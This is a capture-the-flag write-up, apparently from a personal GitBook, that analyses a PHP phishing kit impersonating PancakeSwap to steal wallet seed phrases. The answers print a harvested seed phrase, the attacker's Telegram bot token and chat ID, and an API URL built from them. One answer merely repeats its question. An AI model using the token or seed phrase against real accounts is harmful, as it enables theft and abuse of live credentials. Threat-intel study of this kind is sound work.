GLITCH
  • Who Am I ?
  • WRITEUPS
    • CyberDefenders Labs
      • PhishStrike Write-up
      • OpenWire Write-up
      • BlueSky Ransomware Write-up
      • PsExec Hunt Write-up
      • Red Stealer Write-up
      • Amadey Write-up
      • GrabThePhisher Write-up
      • BlackEnergy Write-up
  • SUMMARIEs
    • Phishing
    • Kerberos_AD
    • Bug Hunting
    • MITRE
  • OSEP
  • GLITCH HUB
    • Books
    • Courses
      • Youtube
    • Githubs
    • Tools
    • Bookmarks
  • Projects
    • Youtube Downloader
  • Malware Analysis
    • SOON!
Powered by GitBook
On this page
  • Instructions:
  • Scenario:
  • Questions:
  • 1. Which wallet is used for asking the seed phrase?
  • 2. What is the file name that has the code for the phishing kit?
  • 3. In which language was the kit written?
  • 4. What service does the kit use to retrieve the victim’s machine information?
  • 5. How many seed phrases were already collected?
  • 6. Write down the seed phrase of the most recent phishing incident?
  • 7. Which medium had been used for credential dumping?
  • 8. What is the token for the channel?
  • 9. What is the chat ID of the phisher’s channel?
  • 10. What are the allies of the phish kit developer?
  • 11. What is the full name of the Phish Actor?
  • 12. What is the username of the Phish Actor?
  • You Can Find me Here!
  1. WRITEUPS
  2. CyberDefenders Labs

GrabThePhisher Write-up

PreviousAmadey Write-upNextBlackEnergy Write-up

Last updated 6 months ago

:الحمد لله والصلاة والسلام على رسول الله وعلى آله وصحبه أما بعد

Instructions:

  • Uncompress the lab (pass: )

Scenario:

An attacker compromised a server and impersonated , a decentralized exchange native to BNB Chain, to host a phishing kit at . The attacker set it as an open directory with the file name “pankewk.zip”.

Provided the phishing kit, you as a soc analyst are requested to analyze it and do your threat intel homework.

Link:

Medium:

Questions:

1. Which wallet is used for asking the seed phrase?

After Download the zip file you will notice an index.html file open it

The answer will be the first wallet, and the answer depends on the folder named after it in the zip file

Answer: Metamask

2. What is the file name that has the code for the phishing kit?

Answer: What is the file name that has the code for the phishing kit?

3. In which language was the kit written?

Answer: PHP

4. What service does the kit use to retrieve the victim’s machine information?

Answer: Sypex Geo

5. How many seed phrases were already collected?

Answer: 3

6. Write down the seed phrase of the most recent phishing incident?

Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey

7. Which medium had been used for credential dumping?

Answer: Telegram

8. What is the token for the channel?

Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

9. What is the chat ID of the phisher’s channel?

Answer: 5442785564

10. What are the allies of the phish kit developer?

Answer: j1j1b1s@m3r0

11. What is the full name of the Phish Actor?

Answer: Marcus Aurelius

12. What is the username of the Phish Actor?

Answer: pumpkinboii

You Can Find me Here!

Request the api to get the answers “

Blog: /

Linkedin:

Facebook:

Tryhackme:

https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564”
https://g1it0h.gitbook.io/glitch
https://www.linkedin.com/in/glitchgc/
https://www.facebook.com/GLITC.GC/
https://tryhackme.com/p/GLITCH1GC
cyberdefenders.org
https://pancakeswap.finance/
https://apankewk.soup.xyz/mainpage.php
https://cyberdefenders.org/blueteam-ctf-challenges/grabthephisher/
https://medium.com/@GLITCHGC/grabthephisher-write-up-b99849f18a73